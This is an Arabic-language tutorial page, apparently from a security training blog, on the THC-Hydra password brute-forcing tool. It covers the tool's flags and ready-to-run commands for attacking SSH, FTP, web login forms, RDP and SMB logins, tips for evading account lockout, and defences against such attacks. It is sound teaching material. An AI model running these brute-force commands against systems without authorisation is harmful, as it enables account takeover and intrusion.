أداة تخترق أي خادم في ثوانٍ — وهذا ما لم تعرفه عن Hydra

أداة تخترق أي خادم في ثوانٍ — وهذا ما لم تعرفه عن Hydra

THC-Hydra: دليل الاختراق الشامل | GloSecLab
// PENETRATION TESTING // PASSWORD CRACKING

أداة THC-Hydra
الدليل الشامل للاختراق الأخلاقي

كل ما تحتاج معرفته عن Hydra — من المفهوم الأساسي إلى الاستخدام الاحترافي في اختبارات الاختراق عبر SSH، FTP، HTTP وأكثر من 50 بروتوكول آخر

Kali Linux Intermediate Level Ethical Hacking GloSecLab

ما هي THC-Hydra؟

Hydra — أو THC-Hydra — هي أداة كسر كلمات المرور عبر الشبكة (Online Password Cracker) متوازية الأداء، مضمّنة بشكل افتراضي في Kali Linux وParrot OS وغيرها من بيئات Penetration Testing.

طوّرتها مجموعة القراصنة الشهيرة "The Hacker's Choice" (THC)، وصدر أول إصدار منها عام 2000 كـ Proof of Concept لإثبات مدى سهولة اختراق خدمات تسجيل الدخول عبر الشبكة.

الفرق الجوهري بينها وبين أدوات مثل John the Ripper أو Hashcat هو: هذه الأخيرة تعمل Offline (على هاشات محفوظة)، بينما Hydra تعمل Online — أي تتفاعل مباشرة مع الخدمة الحية عبر الشبكة في الوقت الفعلي.

⚠️ تحذير قانوني: استخدام Hydra على أنظمة لا تمتلك إذنًا صريحًا باختبارها هو جريمة جنائية في معظم دول العالم. استخدمها حصريًا في بيئات مخصصة للتدريب مثل HackTheBox أو TryHackMe أو مختبراتك الخاصة.

⚙️

كيف تعمل Hydra؟

تعتمد Hydra على مبدأ Parallelization (التوازي): تشغّل عدة Threads في آنٍ واحد لمحاولة تسجيل الدخول بمجموعات مختلفة من اسم المستخدم وكلمة المرور. كل Thread يُعرَّف بـ "Hydra Head"، وتُدار كل هذه الرؤوس بواسطة بنية مركزية تُسمى "Hydra Brain".

01

تحديد الهدف والبروتوكول

تحدد الـ IP أو الـ URL والبروتوكول المستهدف (SSH, FTP, HTTP...)

02

تحميل Wordlist

تُغذّي الأداة بقائمة أسماء المستخدمين وكلمات المرور للمحاولة (مثل rockyou.txt)

03

الهجوم المتوازي

تُطلق Hydra عدة اتصالات في آنٍ واحد (افتراضياً 16 Thread) لتسريع العملية بشكل كبير

04

تحليل الاستجابة

تُحلّل الأداة ردّ الخادم لتحديد إن كان تسجيل الدخول ناجحًا أم فاشلًا

05

عرض النتيجة

عند العثور على بيانات صحيحة، تعرضها فوراً وتحفظها في ملف الـ output


📦

التثبيت

Hydra مثبتة مسبقًا في Kali Linux، لكن يمكنك تثبيتها يدويًا على أي توزيعة:

BASH — Installation
# Kali / Debian / Ubuntu sudo apt update && sudo apt install hydra -y # Arch Linux / BlackArch sudo pacman -S hydra # From Source (GitHub) git clone https://github.com/vanhauser-thc/thc-hydra cd thc-hydra && ./configure && make && make install # Docker docker pull vanhauser/hydra # التحقق من الإصدار hydra --version

💻

الصياغة الأساسية

SYNTAX — Basic Structure
hydra [options] protocol://target[:PORT][/path] # المثال الأبسط: username + password واحد hydra -l admin -p password123 ssh://192.168.1.1 # الأكثر استخدامًا: wordlist كاملة hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10 # قائمة users + قائمة passwords hydra -L users.txt -P passwords.txt ftp://192.168.0.1

📋

جدول المعاملات الكاملة

الـ Flag الوصف مثال
-l LOGINusername واحد-l admin
-L FILEقائمة usernames من ملف-L users.txt
-p PASSpassword واحدة-p 12345
-P FILEقائمة passwords من ملف (Wordlist)-P rockyou.txt
-C FILEملف بصيغة user:pass مدمجة-C combos.txt
-t NUMعدد الـ Threads المتوازية (افتراضي: 16)-t 4
-T NUMعدد الـ Threads عند استهداف عدة Hosts-T 64
-s PORTPort مختلف عن الافتراضي-s 2222
-Sاستخدام SSL-S
-fإيقاف الهجوم عند أول نجاح (لـ Host واحد)-f
-Fإيقاف الهجوم عند أول نجاح (لكل الـ Hosts)-F
-o FILEحفظ النتائج في ملف-o results.txt
-v / -Vوضع Verbose (عرض كل المحاولات)-V
-dDebug Mode (للتشخيص)-d
-Rاستكمال جلسة سابقة منقطعة-R
-w TIMEوقت الانتظار بين المحاولات (ثانية)-w 3
-W TIMEوقت الانتظار بين اتصالات كل Thread-W 2
-e nsrتجربة: null password (n)، login=pass (s)، reversed (r)-e ns
-x MIN:MAX:CHARSETتوليد passwords بـ Brute Force خام-x 4:6:aA1
-uالتكرار على المستخدمين بدل Passwords-u
-M FILEاستهداف قائمة Hosts في آنٍ واحد-M hosts.txt
-6استخدام IPv6-6

🌐

البروتوكولات المدعومة (+50 بروتوكول)

Hydra تدعم طيفًا واسعًا جداً من البروتوكولات، مما يجعلها الأداة الأشمل في هذا المجال:

SSH
FTP
HTTP-GET
HTTP-POST
HTTPS
RDP
SMB
SMTP
POP3
IMAP
MySQL
MSSQL
PostgreSQL
Oracle
VNC
Telnet
LDAP
SNMP
SIP
IRC
XMPP
SOCKS5
HTTP-Proxy
Firebird
CVS
AFP
NCP
NNTP
Rlogin
VMware

🔬

أمثلة عملية مفصّلة

01 / هجوم SSH

SSH Attack
# هجوم بسيط على SSH hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10 # مع تحديد Port مختلف + Verbose + حفظ نتائج hydra -l user -P passwords.txt -s 2222 -V -o found.txt ssh://192.168.1.100 # قائمة users + توقف عند أول نجاح hydra -L users.txt -P rockyou.txt -f -t 4 ssh://10.10.10.10

02 / هجوم FTP

FTP Attack
# هجوم FTP كلاسيكي hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.0.1 # مع تحقق من null + login=pass hydra -l ftpuser -P wordlist.txt -e ns ftp://10.0.0.5 # هجوم على قائمة Hosts hydra -L users.txt -P pass.txt -M hosts.txt ftp

03 / هجوم على Web Login Form (HTTP POST)

هذا النوع هو الأصعب والأكثر استخدامًا في الـ CTF وWAP Pentesting. تحتاج لمعرفة: اسم الـ Fields + رسالة الخطأ.

HTTP-POST-FORM Attack
# الصيغة العامة: # hydra [IP] http-post-form "/path:param1=^USER^¶m2=^PASS^:F=ERROR_MSG" # مثال: DVWA Login hydra 10.10.10.10 http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed" -L users.txt -P rockyou.txt -V # مثال: WordPress Login hydra -l admin -P rockyou.txt 10.10.10.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username" # مثال: نجاح عند Redirect (S= بدل F=) hydra -l admin -P rockyou.txt 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:S=dashboard"
💡 Tip: لمعرفة أسماء الـ Fields، استخدم DevTools في المتصفح (F12 → Network → ابحث عن POST Request عند تسجيل الدخول). أو استخدم Burp Suite لالتقاط الـ Request.

04 / هجوم RDP

RDP Attack
# RDP — استخدم -t 1 لتفادي Account Lockout hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.50

05 / هجوم SMB

SMB Attack
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.10.10 smb

06 / Brute Force خام بدون Wordlist

Pure Brute Force — -x flag
# -x MIN:MAX:CHARSET # a = lowercase | A = uppercase | 1 = digits | يمكن إضافة رموز مثل !@# # passwords من 4 إلى 6 أحرف: أرقام فقط hydra -l admin -x 4:6:1 ssh://10.10.10.10 # passwords من 3 إلى 5: حروف كبيرة + صغيرة + أرقام hydra -l root -x 3:5:aA1 ftp://192.168.1.1

🎯

نصائح احترافية

🔥 RDP و SMB: استخدم دائمًا -t 1 أو -t 4 كحد أقصى لتفادي Account Lockout الذي قد يُنبّه المسؤول أو يحجب الاختبار.
📁 Wordlists الأفضل في Kali: /usr/share/wordlists/rockyou.txt (14 مليون كلمة مرور)، و/usr/share/seclists/ (مجموعة ضخمة لـ Usernames وPasswords المخصصة).
⚡ الأداء: استخدم -t 64 على الشبكات المحلية السريعة للحصول على أقصى سرعة. لكن على الأنظمة الحساسة، خفّض الـ Threads.
🔄 استمرارية الجلسة: إذا انقطع الهجوم، استخدم hydra -R لاستكمال من حيث توقفت دون خسارة التقدم.
🕵️ مراقبة الـ Traffic: عند استهداف HTTP Forms، استخدم Wireshark أو Burp Suite لفهم بنية الـ Request بدقة قبل شن الهجوم.

⚔️

Hydra مقابل الأدوات المماثلة

الأداة النوع Online 50+ بروتوكول سرعة عالية مناسب للـ CTF
Hydra Online Cracker
Medusa Online Cracker متوسط
Ncrack Online Cracker متوسط محدود
John the Ripper Offline Hash Cracker
Hashcat Offline Hash Cracker (GPU) ✔✔

🛡️

كيف تحمي نفسك من Hydra؟

معرفة الهجوم تعني معرفة الدفاع. إليك أبرز الإجراءات لحماية أنظمتك:

🔑

كلمات مرور قوية ومعقدة

استخدم كلمات مرور بأكثر من 12 حرفاً تجمع بين أحرف كبيرة وصغيرة وأرقام ورموز. تجنب القواميس والمعاجم.

🚫

Account Lockout Policy

قفل الحساب تلقائياً بعد 3-5 محاولات فاشلة. يجعل Brute Force مستحيلاً عملياً.

🔐

تفعيل MFA / 2FA

حتى لو نجح المهاجم في كسر كلمة المرور، لن يستطيع الدخول بدون الـ OTP أو مفتاح الـ Authenticator.

🌐

تغيير البورتات الافتراضية

نقل SSH من Port 22 إلى Port غير معتاد (مثل 54321) يقلل الهجمات الآلية بنسبة كبيرة.

🛑

Fail2Ban & Rate Limiting

أداة Fail2Ban تحجب تلقائياً أي IP يتجاوز عدداً معيناً من محاولات الدخول الفاشلة.

🗝️

SSH Keys بدل Passwords

تعطيل تسجيل الدخول بكلمة مرور عبر SSH والاعتماد حصراً على مفاتيح RSA/Ed25519 يجعل Hydra عديمة الأثر تماماً.


THC-Hydra هي ببساطة واحدة من أقوى وأشمل أدوات كسر كلمات المرور في عالم الـ Penetration Testing. دعمها لأكثر من 50 بروتوكول، سرعتها العالية بفضل التوازي، ومرونتها في التخصيص تجعلها لا غنى عنها في أي Pentester's Arsenal. لكن تذكر دائماً: القوة الحقيقية تأتي مع المسؤولية. استخدامها بشكل قانوني وأخلاقي هو ما يفرّق بين الـ Ethical Hacker والمجرم.

Penetration Testing · Kali Linux · OSINT

© 2025 GloSecLab — للأغراض التعليمية والأخلاقية فقط